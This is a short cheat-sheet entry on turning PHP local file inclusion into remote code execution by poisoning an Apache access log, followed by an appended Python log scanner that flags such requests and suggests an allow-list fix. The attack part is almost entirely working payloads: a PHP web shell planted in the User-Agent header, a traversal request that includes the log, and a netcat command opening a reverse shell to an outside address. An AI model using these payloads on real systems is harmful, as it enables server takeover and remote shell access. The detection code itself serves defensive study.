PHP LFI with RCE

Put PHP payload into access log (User-Agent header)

GET / HTTP/1.1
Host: 11.22.33.44
User-Agent: MozillaHacked<pre><?php echo shell_exec($_REQUEST['cmd']) ?></pre>

RCE - POC

GET http://$IP/index.php?file=../../../../../../../../var/log/apache2/access.log&cmd=id

RCE

POST /index.php?file=../../../../../../../../var/log/apache2/access.log HTTP/1.1
Host: 192.168.240.72:8593
Content-Type: application/x-www-form-urlencoded

cmd=netcat 55.66.77.88 4444 -e /bin/bash
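
Detection

A defender-side check for the requests above, added here as an example and not part of the original page: it scans Apache combined-format access log lines for PHP open tags in logged request fields and for requests that traverse to a log file. The function names, sample lines and client addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' \d{3} \S+ ' + QUOTED + ' ' + QUOTED
)
FIELDS = ("request", "referer", "agent")
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"(?:\.\./){2,}")
LOG_TARGET_RE = re.compile(r"/var/log/|access\.log|error\.log", re.IGNORECASE)


def decode(value):
    """Percent-decode twice so double-encoded traversal is normalised too."""
    return unquote(unquote(value))


def scan(lines):
    """Return (line_number, client, reason) tuples for suspicious entries."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = LINE_RE.match(line)
        if not match:
            continue  # not combined format; skip rather than guess
        client = match.group(1)
        values = dict(zip(FIELDS, (decode(v) for v in match.groups()[1:])))
        for field in FIELDS:
            if PHP_TAG_RE.search(values[field]):
                findings.append((number, client, f"php-tag-in-{field}"))
        request = values["request"]
        if TRAVERSAL_RE.search(request) and LOG_TARGET_RE.search(request):
            findings.append((number, client, "include-of-log-file"))
    return findings


# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE = """\
198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET / HTTP/1.1" 200 512 "-" "MozillaHacked<pre><?php echo shell_exec($_REQUEST['cmd']) ?></pre>"
203.0.113.9 - - [10/Oct/2023:13:56:20 +0000] "GET /index.php?file=../../../../../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 4096 "-" "curl/8.0"
203.0.113.9 - - [10/Oct/2023:13:57:02 +0000] "GET /index.php?file=%2e%2e%2f%2e%2e%2f..%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1" 200 4096 "-" "curl/8.0"
""".splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A php-tag hit means the log file now holds PHP source and should be rotated before anything can include it. The underlying fix is on the application side: resolve the `file` parameter against an allow-list of known pages instead of passing it to an include.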